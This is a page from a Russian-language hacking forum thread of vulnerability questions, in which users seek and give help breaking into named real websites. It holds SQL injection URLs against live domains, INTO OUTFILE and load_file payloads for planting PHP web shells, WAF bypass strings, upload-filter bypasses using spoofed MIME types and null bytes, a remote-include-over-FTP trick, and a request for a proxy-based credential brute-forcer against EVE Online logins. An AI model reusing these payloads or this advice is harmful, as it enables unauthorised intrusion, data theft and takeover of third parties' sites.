PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 [71] 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

BassCreator
06.07.2011, 12:13
Дано: веб-морда для логина https://www.eveonline.com/login.asp

список вида логин:пасс

Нужно: программа, умеющая работать с таким видом брутфорса через прокси.

Насколько я понял, WBF не имеет функции перебора по такому списку, а иных возможных вариантов не знаю.

P.S. Также есть альтернативная веб-морда https://gate.eveonline.com/LogOn но её стоит использовать только в качестве резервной т.к. она, по всей видимости, более медленная.

Nek1t
06.07.2011, 16:44
PHPLIVE 3.2.2

Есть доступ к админке, но сделана она параноиком, фильтруется там все, что можно.

Есть два интересных момента.

Первый:


PHP:
if ($action=="upload_logo")

{

$pic_name=$_FILES['pic']['name'] ;

$now=time() ;

$filename=eregi_replace(" ","_",$pic_name) ;

$filename=eregi_replace("%20","_",$filename) ;

$filesize=$_FILES['pic']['size'] ;

$filetype=$_FILES['pic']['type'] ;

if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

$filename=$_POST['logo_name']."_$now.$extension";

if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

chmod("../web/$session_setup[login]/$filename",0777) ;

if ($_POST['logo_name'] =="LOGO")

{

if (file_ exists("../web/$session_setup[login]/$LOGO") &&$LOGO)

unlink("../web/$session_setup[login]/$LOGO") ;

$LOGO=$filename;

}



Не вижу вариантов обхода фильтра...

Второй ($COMPANY_NAME задается пользователем):


PHP:
functionUtil_Format_CleanVariable($string)

{

// take out common malicious characters that are

// typically NOT used on standard inputs

$string=preg_replace("/[$#;?]|(eval\()|(eval +\()|(char\()|(char +\()|(exec\( )|(exec +\()/i","",trim(rtrim($string) ) ) ;

return$string;

}

$COMPANY_NAME=addslashes(Util_Format_CleanVariable ($COMPANY_NAME) ) ;



$conf_string="0LEFT_ARROW0?php

\$LOGO = '$LOGO' ;

\$COMPANY_NAME = '$COMPANY_NAME' ;

\$SUPPORT_LOGO_ONL INE = '$SUPPORT_LOGO_ONLINE' ;

\$SUPPORT_LOGO_OFF LINE = '$SUPPORT_LOGO_OFFLINE' ;

\$SUPPORT_LOGO_AWA Y = '$SUPPORT_LOGO_AWAY' ;

\$VISITOR_FOOTPRIN T = '$VISITOR_FOOTPRINT' ;

\$THEME = '$THEM E' ;

\$POLL_TIME = '$ POLL_TIME' ;

\$INITIATE = '$I NITIATE' ;

\$INITIATE_IMAGE = '$INITIATE_IMAGE' ;

\$IPNOTRACK = '$ IPNOTRACK' ;

\$LANG_PACK = '$ LANG_PACK' ;?0RIGHT_ARROW0";

$conf_string=preg_replace("/0LEFT_ARROW0/","",$conf_string) ;

$fp=fopen("../web/$session_setup[login]/$session_setup[login]-conf-init.php","wb+") ;

fwrite($fp,$conf_string,strlen($conf_string) ) ;

fclose($fp) ;



eval просто заменяется на альтернативу, а вот что делать с экранированием кавычек, ";" и т.д.? Безнадежный случай?

xxddz
06.07.2011, 16:56
Есть такая уязвимость в админке:

http://100kotlov.ru/admin/?alert(/ololo/)

После http://100kotlov.ru/admin/? любой html код или javascript.

Можно ли залить как-нибудь шелл?

Где можно найти такой скрипт?Хочу посмотреть на него изнутри.

XAMEHA
06.07.2011, 17:02
xxddz said:
Есть такая уязвимость в админке:
http://100kotlov.ru/admin/?alert(/ololo/)
После http://100kotlov.ru/admin/? любой html код или javascript.
Можно ли залить как-нибудь шелл?
Где можно найти такой скрипт?Хочу посмотреть на него изнутри.


Если уже есть доступ в админку, то никак. Если нету, то можно его получить(XXS). "Эта вставка HTML, через неё шелл не зальёш.

XAMEHA
06.07.2011, 17:09
Nek1t said:
PHPLIVE 3.2.2
Есть доступ к админке, но сделана она параноиком, фильтруется там все, что можно.
Есть два интересных момента.
Первый:

PHP:
if ($action=="upload_logo")

{

$pic_name=$_FILES['pic']['name'] ;

$now=time() ;

$filename=eregi_replace(" ","_",$pic_name) ;

$filename=eregi_replace("%20","_",$filename) ;

$filesize=$_FILES['pic']['size'] ;

$filetype=$_FILES['pic']['type'] ;

if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

$filename=$_POST['logo_name']."_$now.$extension";

if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

chmod("../web/$session_setup[login]/$filename",0777) ;

if ($_POST['logo_name'] =="LOGO")

{

if (file_ exists("../web/$session_setup[login]/$LOGO") &&$LOGO)

unlink("../web/$session_setup[login]/$LOGO") ;

$LOGO=$filename;

}



Не вижу вариантов обхода фильтра...


В переменную $_FILES['pic']['type'] подставляем слово JPEG (MIME-Тип(Tamper Data)).

В переменную $_POST['logo_name'] пишем название шелла(shell.php) Заполняя конец NUL-байтом.

Ну и если в папке разрешено выполнение PHP скироптов(php3, php4, php5, php, phtml...), в теории мы должны получить шелл.

Во втором случае, если бы параметр не обрамлялся одинарными кавычками, возможно было бы использовать обратные кавычки.

Nek1t
06.07.2011, 17:59
NULL-байт, к сожалению, экранируется.

Chrome~
06.07.2011, 18:05
XAMEHA said:
В переменную $_FILES['pic']['type'] подставляем слово JPEG (MIME-Тип(Tamper Data)).
В переменную $_POST['logo_name'] пишем название шелла(shell.php) Заполняя конец NUL-байтом.


Этот вариант с null байтом срабатывает довольно редко.

Но все это натолкнуло меня на одну мысль, если я не прав, тогда исправьте.

Вот здесь делаеться замечательная проверка:


PHP:
if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

Но что если ниодно из условий не выполниться? - $extension не перезапишется. Мы можем сделать так, что бы в переменной $_FILES['pic']['type'] не оказалось подстрок gif и jpeg и с помощью GET параметров указать значение $extension вот так:


http://site.ru/.../script.php?
extension=php


Мы снова должны получить шелл.

Зависимость: register_globals=on

winstrool
06.07.2011, 20:35
есть запрос на заливку такого типа:

+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+

там где /tmp/1.txt фильтруется, что сдесь можно придумать?

кавычки не фильтруются и не экранируются, load_file() так же работает нормально.

попугай
06.07.2011, 21:04
Chrome~ said:
Этот вариант с null байтом срабатывает довольно редко.
Но все это натолкнуло меня на одну мысль, если я не прав, тогда исправьте.
Вот здесь делаеться замечательная проверка:

PHP:
if (eregi("gif",$filetype) )

$extension="GIF";

elseif (eregi("jpeg",$filetype) )

$extension="JPEG";

Но что если ниодно из условий не выполниться? -
$extension
не перезапишется. Мы можем сделать так, что бы в переменной
$_FILES['pic']['type']
не оказалось подстрок
gif
и
jpeg
и с помощью GET параметров указать значение
$extension
вот так:
Мы снова должны получить шелл.
Зависимость:
register_globals=on



Проверка происходит здесь


PHP:
if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{

Chrome~
06.07.2011, 21:45
попугай said:
Проверка происходит здесь

PHP:
if (eregi("gif",$filetype) ||eregi("jpeg",$filetype) )

{

if(move_uploaded_file($_FI LES['pic']['tmp_name'],"../web/$session_setup[login]/$filename") )

{



Да, правильно, не досмотрел. Я позже нашел исходный код этого скрипта. Даже если бы не было проверки, все равно вариант не сработал бы, так как в полной версии увидел, что происходит инициализация переменных.

ZARO
06.07.2011, 21:49
winstrool said:
есть запрос на заливку такого типа:
+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+
там где /tmp/1.txt фильтруется, что сдесь можно придумать?
кавычки не фильтруются и не экранируются, load_file() так же работает нормально.


Так что фильтруется? Я не понял

winstrool
06.07.2011, 22:07
ZARO said:
Так что фильтруется? Я не понял


%69nto+%6futfile+'[то что находится сдесь]'+--+

Melfis
06.07.2011, 23:33
winstrool said:
есть запрос на заливку такого типа:
+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+
там где /tmp/1.txt фильтруется, что сдесь можно придумать?
кавычки не фильтруются и не экранируются, load_file() так же работает нормально.


я не думаю, что там какая-то регулярка, которая вырезает данные между кавычками. Явно в чём-то другом проблема.

ZARO
07.07.2011, 00:35
Melfis said:
я не думаю, что там какая-то регулярка, которая вырезает данные между кавычками. Явно в чём-то другом проблема.


угу) я тоже так думаю. лучше поделись ссылкой

qaz
07.07.2011, 00:36
2 колонки, версию и тп выводит нормально, хочу вывести названия таблиц и выводит ошибку

http://www.tmgrupo.ru/info.php?id_article=-5+union+select+table_name,2+from+information_schem a.tables--+

почему?

d1v
07.07.2011, 00:40
qaz said:
2 колонки, версию и тп выводит нормально, хочу вывести названия таблиц и выводит ошибку
http://www.tmgrupo.ru/info.php?id_article=-5+union+select+table_name,2+from+information_schem a.tables--+
почему?


потому что это 4ая ветка. в ней нет information_schema

qaz
07.07.2011, 01:17
d1v said:
потому что это 4ая ветка. в ней нет information_schema


понял, спасибо,

вот ещо вопрос

я хотел попробовать залить шелл как написано в статье

http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+

но ничего не получилось, почему?

d1v
07.07.2011, 01:20
qaz said:
понял, спасибо,
вот ещо вопрос
я хотел попробовать залить шелл как написано в статье
http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+
но ничего не получилось, почему?


потому что путь до 1.php должен быть полный, а не относительный - это первое что, бросилось в глаза.

во-вторых залить шелл ты можешь только в папку доступную на запись (с) К.О.

ну и magic quotes должны быть off.

Melfis
07.07.2011, 01:21
qaz said:
понял, спасибо,
вот ещо вопрос
я хотел попробовать залить шелл как написано в статье
http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,''+INTO+OUTFILE '1.php'--+
но ничего не получилось, почему?


magic_quotes. Тобишь кавычки фильтруются.

Nek1t
07.07.2011, 01:22
На уровне веб-сервера фильтруется сочетание INFORMATION_SCHEMA.TABLES. Можно как-то обойти с помощью тонкостей синтаксиса MySQL?


script.php?id=5+UNION(SELECT(1),(2),(3),(4),(5),(6 )FROM(INFORMATION_SCHEMA.TABLES))--

Sc0rpi0n
07.07.2011, 01:22
Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj

Melfis
07.07.2011, 01:26
Nek1t said:
На уровне веб-сервера фильтруется сочетание INFORMATION_SCHEMA.TABLES. Можно как-то обойти с помощью тонкостей синтаксиса MySQL?


ну если магические ковычки офф, то поставь information_schema.`tables`

`information_schema`.`tables`

`information_schema`.tables

qaz
07.07.2011, 01:31
d1v said:
потому что путь до 1.php должен быть полный, а не относительный - это первое что, бросилось в глаза.
во-вторых залить шелл ты можешь только в папку доступную на запись (с) К.О.
ну и magic quotes должны быть off.


хорошо, тогда ешо два вопроса, как можо узнать полный путь если он например в ошибке не указывается

и

как узнать достапна папка на запись или нет, или как искать доступные для записи папки?

Melfis
07.07.2011, 01:35
/srv/www/velotaxi.de/htdocs/php/subnav.php

вот он путь то. Узнать путь - смотреть соседние сайты к примеру и пытаться у них вызвать ошибку / залить шелл.

Узнать права на запись - попробовать собсна залить. Мож к картинкам каким сможешь залить. Посмотри ссылки на сайте или сканером диров каким-нить воспользуйся. Тебе ещё забыли сказать, у тя должны быть права файловые под юзером бд.

d1v
07.07.2011, 01:37
qaz said:
хорошо, тогда ешо два вопроса, как можо узнать полный путь если он например в ошибке не указывается
и
как узнать достапна папка на запись или нет, или как искать доступные для записи папки?


ну как это в ошибке не указыается?


Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33

папку ищи логически) в какую папку может быть разрешена запись? правильно - в ту, в которую что-то загружают. это могут быть картинки, аватарки, документы и т.д.

можно залить в папку tmp в корне сервера, которая в 99% доступна на запись и оттуда уже проинклудить (при наличии инклуда конечно)

попугай
07.07.2011, 01:57
d1v said:
ну как это в ошибке не указыается?

Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33

папку ищи логически) в какую папку может быть разрешена запись? правильно - в ту, в которую что-то загружают. это могут быть картинки, аватарки, документы и т.д.
можно залить в папку tmp в корне сервера, которая в 99% доступна на запись и оттуда уже проинклудить (при наличии инклуда конечно)



А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?

d1v
07.07.2011, 01:58
попугай said:
А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?


что бы человек понял и впредь у него подобных вопросов не вознивало. наверное для этого.

swad
07.07.2011, 03:54
Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.

Вот и возник вопрос..

Как можно дампнуть таблицу с колонками самым быстрым способом?

d1v
07.07.2011, 04:00
swad said:
Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.
Вот и возник вопрос..
Как можно дампнуть таблицу с колонками самым быстрым способом?


заюзай автоинжектеры какие-нить. sqlihelper, havij, mysqli dumper, etc

XAMEHA
07.07.2011, 06:46
swad said:
Есть сайт со скулей, таблица с пользователями и колонки в ней известны, но получается выводить только по 1 значению с каждой строчки, т.е. всю таблицу сразу не вывести.
Вот и возник вопрос..
Как можно дампнуть таблицу с колонками самым быстрым способом?


Можно вывести всё сразу, одним запросом. Если конечно нет огранечений, и сервер не зависнет: /showpost.php?p=2298777&postcount=16 (https://antichat.live/showpost.php/p/2298777/postcount/16/)

qaz
07.07.2011, 12:03
d1v said:
ну как это в ошибке не указыается?

Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/velotaxi.de/htdocs/php/subnav.php on line 33



не, я не имею в виду етот случай, если вдруг например не указывается, то как ещо можно узнать?


попугай said:
А смысл искать путь и находить папку для записи, если file_priv все равно там отключен?


а можно поинтерисоватся, а как вы об етом узнали?

winstrool
07.07.2011, 12:12
чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv

XAMEHA
07.07.2011, 12:36
alexvrn said:
Как обойти проверку файлов на формат и залить php
config.php

Code:
$Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','as cx','jsp','cfm','cfc','pl','bat','exe','dll','reg' ,'cgi') ;



Пропустили php4. Если на сервере установлены дополнительные яп/в application/x-httpd-php прописано нестандартное расширение - можно воспользоваться этим.

Мы можем пройти эту проверку:


PHP:
if ( (count($arAllowed) >0&& !in_array($sExtension,$arAllowed) ) || (count ($arDenied) >0&&in_array($sExtension,$arDenied) ) )SendResults(' 202') ;

Если напишем в переменную $_GET['Type'] то, что не предусматривает разработчик(Например '!!!'). И соответственно зальём шелл.

qaz
07.07.2011, 13:09
winstrool said:
чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv


а можешь показать как ето делать на примере, например тут

http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--

Melfis
07.07.2011, 13:16
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+

Только у тя прав нету файловых

И вообще, по теме залива шелла через мускульную инъекцию дохрена написано. Не проще почитать всё разом, чтобы усвоить всё сразу? Тебе ж выше в куче постов всё подробно разжевали что и как.

qaz
07.07.2011, 13:23
Melfis said:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+
Только у тя прав нету файловых


што дебе дало знать што прав нету? и што бы я увидел если бы они были?

Melfis
07.07.2011, 13:26
qaz said:
што дебе дало знать што прав нету? и што бы я увидел если бы они были?


Подними у ся вебсервер, сделай какой-нить простой скрипт с выборкой из базы и принимаемым параметром от юзвера. И собсна потесть. В основном при установке ты будешь под рутом, у которого есть file_priv - там и увидишь что и как.

Melfis
07.07.2011, 13:53
Если прав нету, то ничего не выводится. Если есть - содержимое файла ;-(

зы. разве в пхп можно через echo выводить массив? Но тут может я ошибаюсь...

XAMEHA
07.07.2011, 13:54
qaz said:
ну сделал
сам скрипт

PHP:




сделал как ты показывал, увидел тотже вывод
http://mai1-ru.h2m.ru/index.php?id=4'+union+select+(select+load_file('/usr/home/mai1-ru/htdocs/index.php'))--+
што я должен из етого понять? непойму


У себя сервер, где ты будешь под рутом, а не на хостинге. Так же убедись, что путь с файлом существует.

Чакэ
07.07.2011, 13:55
qaz said:
а можешь показать как ето делать на примере, например тут
http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--




http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=0x67625F6D69726F626F6577--+


четыре

XAMEHA
07.07.2011, 13:58
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us %20er+where+user=0x67625F6D69726F626F6577--+


Тогда уж так:


http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=user()--+

Чакэ
07.07.2011, 13:59
XAMEHA said:
Тогда уж так:


просто я извращенец

Eridan
08.07.2011, 00:35
У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876

С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.

Sc0rpi0n
08.07.2011, 02:02
Sc0rpi0n said:
Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj


Помогите плиз

aka_zver
08.07.2011, 03:07
Sc0rpi0n said:
Помогите плиз


как бэ Script for BSQL by Grey (http://zalil.ru/31393989)

Extender
08.07.2011, 09:34
Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию).

Все бы хорошо, но:


EXECUTE permission denied on object 'xp_cmdshell'


Как можно повысить себе права? Можте кто-то уже делал запрос?

Читал мануалы по мсскл, но не вкурил =(

Sc0rpi0n
08.07.2011, 15:39
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263

Seravin
08.07.2011, 16:24
Sc0rpi0n said:
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263


http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+

Sc0rpi0n
09.07.2011, 00:09
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)


Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+

Expl0ited
09.07.2011, 00:13
Sc0rpi0n said:
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)

Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+





Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+

Sc0rpi0n
09.07.2011, 00:18
Expl0ited said:

Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+



ты чё КЭП??

смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+

Expl0ited
09.07.2011, 00:24
Sc0rpi0n said:
ты чё КЭП??
смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+




Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,(select (table_name)from(information_schema.columns)limit+ 1))--+

Иногда, достаточно просто подумать.

GroM88
09.07.2011, 17:16
Такой вопрос...

Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y

На самом сайте не могу найти директорию для что бы залить файл... там же есть

SquirrelMail version 1.4.15

Нашол директорию где он лежит...

Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?

FlaktW
09.07.2011, 17:39
GroM88 said:
Такой вопрос...
Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
На самом сайте не могу найти директорию для что бы залить файл... там же есть
SquirrelMail version 1.4.15
Нашол директорию где он лежит...
Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?


Заливай в /tmp и ищи инклюд.

GroM88
09.07.2011, 17:41
FlaktW said:
Заливай в /tmp и ищи инклюд.


нет инклуда = \

На сайте есть phpmyadmin, Логины и пассы к бд повыдирал из конфигов... но на pma стоит вебавторизация, логины и пассы от бд не подходят = \ .htaccess, .htpasswd в директории пма нет или же я не могу прочитать их там) хотя визде htacces читается!

HAXTA4OK
10.07.2011, 00:59
GroM88 said:
Такой вопрос...
Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
На самом сайте не могу найти директорию для что бы залить файл... там же есть
SquirrelMail version 1.4.15
Нашол директорию где он лежит...
Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?


а поискать конфиг не?

/thread49775.html

sam367
10.07.2011, 17:20
Помогите разобраться с уязвимостью

http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27

нашел уязвимость, не могу ее заюзать, помогите.

FlaktW
10.07.2011, 17:44
sam367 said:
http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
нашел уязвимость, не могу ее заюзать, помогите.


Инъекция есть, но раскрутить не удастся.

Expl0ited
10.07.2011, 18:12
sam367 said:
http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
нашел уязвимость, не могу ее заюзать, помогите.


Там нет уязвимости

GroM88
11.07.2011, 02:30
HAXTA4OK said:
а поискать конфиг не?
/thread49775.html


Ты бы мне шептанул какой конфиг искать?)

P.S. Этим топиком постоянно пользуюсь )

Sloneny
11.07.2011, 18:37
Вопрос про способ заливки шелла

Есть вот такой тип админки, http://www.whatshappening.sg/admin

В ТЕМЕ НЕЛЬЗЯ ПОСТИТЬ ЛОГИНЫ И ПАРОЛИ ВО ИЗБЕЖАНИЕ ДЕФЕЙСОВ

прошу прощения,

тогда вот ссылка на продукт(календарь Helios Calendar )

http://www.refreshmy.com/documentation/?title=Helios

может кто сталкивался с таким?

Как ни старался, не могу придумать как залить туда шелл

Требуется помощь.

pirat0
13.07.2011, 00:20
помогите заюзать скулю, чет у меня не пляшет ниче

http://www.czechstreets.com/?p=tour&start=5'

FlaktW
13.07.2011, 00:37
pirat0 said:
помогите заюзать скулю, чет у меня не пляшет ниче
http://www.czechstreets.com/?p=tour&start=5'


Заюзать скулю, не удастся

pirat0
13.07.2011, 00:38
FlaktW said:
Заюзать скулю, не удастся


почему??

там в конец кода каким то чудесним образом попадает 7, как ее убрать??

Expl0ited
13.07.2011, 00:39
pirat0 said:
помогите заюзать скулю, чет у меня не пляшет ниче
http://www.czechstreets.com/?p=tour&start=5'


Там нет уязвимости, переменная start попадает в значение LIMIT, а LIMIT в свою очередь стоит после ORDER BY. В таком варианте провести инъекцию не возможно.

попугай
13.07.2011, 04:42
http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--

Есть че для обхода WAF?

winstrool
13.07.2011, 05:26
попугай said:
http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--
Есть че для обхода WAF?


прогнался ручками не че не получается, запустил в хэвиджь определил как блинд и подобрал БД, дальше не стал крутить...

P.S.: DB: fullhyd_ascicug

Sc0rpi0n
13.07.2011, 13:08
Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords

Expl0ited
13.07.2011, 13:39
Sc0rpi0n said:
Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords




PHP:
SELECT column_name FROM information_schema.colu mns WHERE column_name LIKE'%pas%'

expupkin
14.07.2011, 03:55
Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?


HTML:
http://engineer.asu.edu/feed-item?page=7

erolom
14.07.2011, 04:26
expupkin said:
Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?

HTML:
http://engineer.asu.edu/feed-item?page=7



скуля, раскрытие путей

expupkin
14.07.2011, 04:36
erolom said:
скуля, раскрытие путей




HTML:
http://engineer.asu.edu/feed-item?page=1'

Почему же так она не пашет ?

d1v
14.07.2011, 04:39
erolom said:
скуля, раскрытие путей


инъекции там нет. просто кривости настройки.

Bramin
14.07.2011, 12:23
Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?

Ups
14.07.2011, 13:10
Bramin said:
Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?


Пароль убери.

Bramin
14.07.2011, 14:36
Ups said:
Пароль убери.


залить повторно шелл нет возможности, дыру прикрыли...есть еще варианты?

p.s оказалось вариант есть через локальный инклуд,

вылетов нет

ysmat
14.07.2011, 17:46
можно ли обойти проверку в is_dir


PHP:
if (@is_dir($_COOKIE['abcd']) {$config=$_COOKIE['abcd']; }

то есть проверку на директорию

допустим нужно задать такой путь

abcd = /home/www/sell.gif

XAMEHA
14.07.2011, 18:49
ysmat said:
можно ли обойти проверку в is_dir

PHP:
if (@is_dir($_COOKIE['abcd']) {$config=$_COOKIE['abcd']; }

то есть проверку на директорию
допустим нужно задать такой путь
abcd = /home/www/sell.gif


Возможно.

Если строка переданная в is_dir, будет наполовину обрезана нулл-байтом, а функция в которую она будет помещена, не будет его считать(Или он после будет убираться) то возможно вставить любой путь.


Code:
/home/www/%00sell.gif

Ну и ещё один вариант:

Если переменная далее будет помещена в функцию, не добавляя к ней ничего в начале(Возможно и добавляя, зависит от кода), и добавляя префикс в конце, а функция будет наподобие той, которая работает с файлами, то возможно будет передать удалённую директорию, например по протоколу FTP:


PHP:
$_COOKIE['abcd'] ='ftp://10.0.0.1/';

//-----------

if (@is_dir($_COOKIE['abcd'])

{

include($_COOKIE['abcd'].'shell.php');//Возможны и другие функции , будет лучше если привед шь полный код

//Ну разумеется на настройк и php.ini тоже следует обрат ть внимание

}

Даже если в данной ситуации путь будет неизвестен, то будет возможно запрограммировать сервер что бы передавал нужный ко по любому запросу.

ysmat
14.07.2011, 19:52
продолжение кода


PHP:
ROOT_DIR// усатановачный путь скрип та

$tpl= newdle_template( );// не совсем понимаю что эт о $tpl не просто переменная а обьект?

$tpl->dir=ROOT_DIR.'/templates/'.$config;// какое-то хитрое обращение к нем у вроде бы полность собир аеться путь

include_once$tpl->dir.'/login.tpl';// собственно сам инклюд

XAMEHA
15.07.2011, 10:01
ysmat said:
продолжение кода

PHP:
//-----------

if (@is_dir($_COOKIE['abcd'])

{

$config=$_COOKIE['abcd'];

$tpl= newdle_template( );// Создание объекта $tpl из к ласса dle_template.

$tpl->dir=ROOT_DIR.'/templates/'.$config;// Сбор пути в одну перемен ную

include_once$tpl->dir.'/login.tpl';// Ну и собственно сам инкл юд

}





Безнадёжная ситуация, но не совсем

1. Если у вас есть доступ у одному каталогу на сервере, и этот скрипт тоже туда имеет доступ, то можно туда залить файл login.tpl, а тут его проинклудить(Даже если там нет прав на выполнение, и файлы обрезаны .htaccess). - Это различные файлообменники, uploader'ы и т. д.

2. Зарегистрировать себе сайт на этом-же хостинге(и сервере), в каталоге /tmp или любом другом, который доступен для всех создать произвольную папку и файл login.tpl, и в переменную $_COOKIE['abcd'] подставить путь к нему, относительно данного сервера.

Но если это не весь код, а просто участки кода из DLE:


PHP:
if ($category_skin!="") {

$category_skin=trim(totranslit($category_skin,fals e,false) );

if ($category_skin!=''AND @is_dir(ROOT_D IR.'/templates/'.$category_skin)) {

$config['skin'] =$category_skin;

}

} elseif (isset ($_REQUEST['action_skin_change'] )) {



$_REQUEST['skin_name'] =trim(totranslit($_REQUEST['skin_name'],false,false) );

echo"!".$_REQUEST['skin_name'];

if ($_REQUEST['skin_name'] !=''AND @is_dir(ROOT_DIR.'/templates/'.$_REQUEST['skin_name'] ) ) {

$config['skin'] =$_REQUEST['skin_name'];

set_cookie("dle_skin",$_REQUEST['skin_name'],365);

}

} elseif (isset ($_COOKIE['dle_skin'] ) ) {

$_COOKIE['dle_skin'] =trim(totranslit($_COOKIE['dle_skin'],false,false) );

if ($_COOKIE['dle_skin'] !=''AND @is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin'] )) {

$config['skin'] =$_COOKIE['dle_skin'];

}

}



PHP:
functiontotranslit($var,$lower=true,$punkt=true) {

global$langtranslit;

if (is_array($var) ) return"";

if (!is_array($langtranslit) OR !count( $langtranslit) ) {

$langtranslit= array(

